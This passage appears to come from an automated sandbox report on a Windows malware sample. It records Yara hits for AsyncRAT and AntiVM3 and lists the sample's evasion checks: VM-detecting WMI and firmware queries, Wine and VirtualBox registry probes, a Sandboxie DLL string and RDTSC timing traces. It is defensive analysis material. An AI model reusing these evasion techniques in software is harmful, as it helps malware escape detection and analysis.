Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0000002A.00000002.4194977140.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6264, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: regsvr32.exe, 0000002A.00000002.4194977140.0000000002841000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: regsvr32.exe, 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLINFO

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: A8F152 second address: A8E98E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F07E8D7A963h 0x00000011 push dword ptr [ebp+122D173Dh] 0x00000017 mov dword ptr [ebp+122D283Eh], ecx 0x0000001d call dword ptr [ebp+122D2903h] 0x00000023 pushad 0x00000024 jmp 00007F07E8D7A967h 0x00000029 xor eax, eax 0x0000002b jmp 00007F07E8D7A962h 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 pushad 0x00000035 mov eax, dword ptr [ebp+122D375Bh] 0x0000003b mov dword ptr [ebp+122D2E26h], edi 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D381Fh], eax 0x00000048 xor dword ptr [ebp+122D2E26h], edx 0x0000004e mov esi, 0000003Ch 0x00000053 mov dword ptr [ebp+122D2E26h], eax 0x00000059 add dword ptr [ebp+122D2E26h], edi 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 jmp 00007F07E8D7A95Eh 0x00000068 lodsw 0x0000006a pushad 0x0000006b mov bh, A6h 0x0000006d popad 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 clc 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 pushad 0x00000078 jc 00007F07E8D7A958h 0x0000007e mov ecx, edx 0x00000080 pushad 0x00000081 jmp 00007F07E8D7A95Bh 0x00000086 mov ebx, dword ptr [ebp+122D36BBh] 0x0000008c popad 0x0000008d popad 0x0000008e nop 0x0000008f pushad 0x00000090 push ecx 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: A8E98E second address: A8E99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007F07E8CE6A8Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: A8E99B second address: A8E9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: A8E9A6 second address: A8E9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: BFEF8D second address: BFEF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: BFEF95 second address: BFEF9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C0D38D second address: C0D3A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F07E8D7A956h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C0D3A0 second address: C0D3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F07E8CE6A92h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C0D655 second address: C0D670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F07E8D7A962h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C0FFC3 second address: C10044 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F07E8CE6A92h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f push edi 0x00000010 sbb di, DC01h 0x00000015 pop esi 0x00000016 mov esi, edx 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F07E8CE6A88h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 mov cl, D0h 0x00000037 jmp 00007F07E8CE6A97h 0x0000003c call 00007F07E8CE6A89h 0x00000041 jc 00007F07E8CE6A8Ah 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a pop edx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 push eax 0x00000052 pop eax 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C10044 second address: C10049 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C10049 second address: C10075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F07E8CE6A96h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jbe 00007F07E8CE6A8Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C10075 second address: C10092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8D7A95Fh 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C10092 second address: C10132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 call 00007F07E8CE6A91h 0x0000000d push ecx 0x0000000e mov edi, dword ptr [ebp+122D285Bh] 0x00000014 pop esi 0x00000015 pop edi 0x00000016 push 00000003h 0x00000018 call 00007F07E8CE6A8Bh 0x0000001d pushad 0x0000001e or dword ptr [ebp+122D2E26h], ebx 0x00000024 mov dword ptr [ebp+122D2702h], edx 0x0000002a popad 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F07E8CE6A88h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a call 00007F07E8CE6A8Bh 0x0000004f call 00007F07E8CE6A92h 0x00000054 mov si, bx 0x00000057 pop edi 0x00000058 pop edx 0x00000059 call 00007F07E8CE6A89h 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F07E8CE6A91h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C10132 second address: C1018A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F07E8D7A956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F07E8D7A968h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jl 00007F07E8D7A958h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b jne 00007F07E8D7A956h 0x00000021 jmp 00007F07E8D7A969h 0x00000026 popad 0x00000027 popad 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C1018A second address: C10200 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F07E8CE6A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jng 00007F07E8CE6A94h 0x00000013 pushad 0x00000014 jo 00007F07E8CE6A86h 0x0000001a jng 00007F07E8CE6A86h 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 jmp 00007F07E8CE6A8Fh 0x0000002a pop eax 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F07E8CE6A88h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 or edx, 71906132h 0x0000004b lea ebx, dword ptr [ebp+12454E72h] 0x00000051 mov dword ptr [ebp+122D2843h], eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jno 00007F07E8CE6A86h 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C103C7 second address: C103CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3066D second address: C30671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C30671 second address: C30679 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C30679 second address: C3067F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3067F second address: C30689 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F07E8D7A956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C30926 second address: C3093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F07E8CE6A8Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C30A86 second address: C30AAC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F07E8D7A964h 0x00000008 jmp 00007F07E8D7A95Eh 0x0000000d push edx 0x0000000e jmp 00007F07E8D7A95Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C30C0F second address: C30C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C30DAA second address: C30DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F07E8D7A95Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C30DBF second address: C30DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8CE6A8Fh 0x00000009 popad 0x0000000a jnc 00007F07E8CE6A8Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C08F48 second address: C08F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C31970 second address: C31981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F07E8CE6A86h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C31981 second address: C3199B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A964h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3199B second address: C3199F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C31AE4 second address: C31AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C31AE8 second address: C31AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C31DDB second address: C31DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3763B second address: C37641 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C37641 second address: C37660 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F07E8D7A958h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e jno 00007F07E8D7A958h 0x00000014 pop edi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C37660 second address: C37666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C37666 second address: C37676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C37676 second address: C3767C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C366D1 second address: C366D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C05A72 second address: C05A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C05A78 second address: C05A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C05A7C second address: C05A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C05A80 second address: C05AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F07E8D7A95Dh 0x00000010 jmp 00007F07E8D7A965h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3BAB0 second address: C3BAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F07E8CE6A91h 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F07E8CE6A86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3BAD0 second address: C3BB10 instructions: 0x00000000 rdtsc 0x00000002 je 00007F07E8D7A956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F07E8D7A958h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F07E8D7A968h 0x00000019 jmp 00007F07E8D7A964h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3BDA9 second address: C3BDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jp 00007F07E8CE6A86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3BDB7 second address: C3BDBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3C322 second address: C3C329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3C329 second address: C3C333 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F07E8D7A95Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3E1B1 second address: C3E21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 je 00007F07E8CE6A9Bh 0x0000000d jmp 00007F07E8CE6A95h 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F07E8CE6A96h 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f jnc 00007F07E8CE6A8Ch 0x00000025 jmp 00007F07E8CE6A98h 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3E21F second address: C3E277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d popad 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F07E8D7A958h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D278Bh], edi 0x0000002f push 83CDE3DAh 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jmp 00007F07E8D7A95Ah 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3E277 second address: C3E282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F07E8CE6A86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3E514 second address: C3E519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3E641 second address: C3E654 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F07E8CE6A8Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3E654 second address: C3E658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3E658 second address: C3E65D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3E9FA second address: C3E9FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3EE63 second address: C3EE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C3F510 second address: C3F521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F07E8D7A95Bh 0x0000000b rdtsc
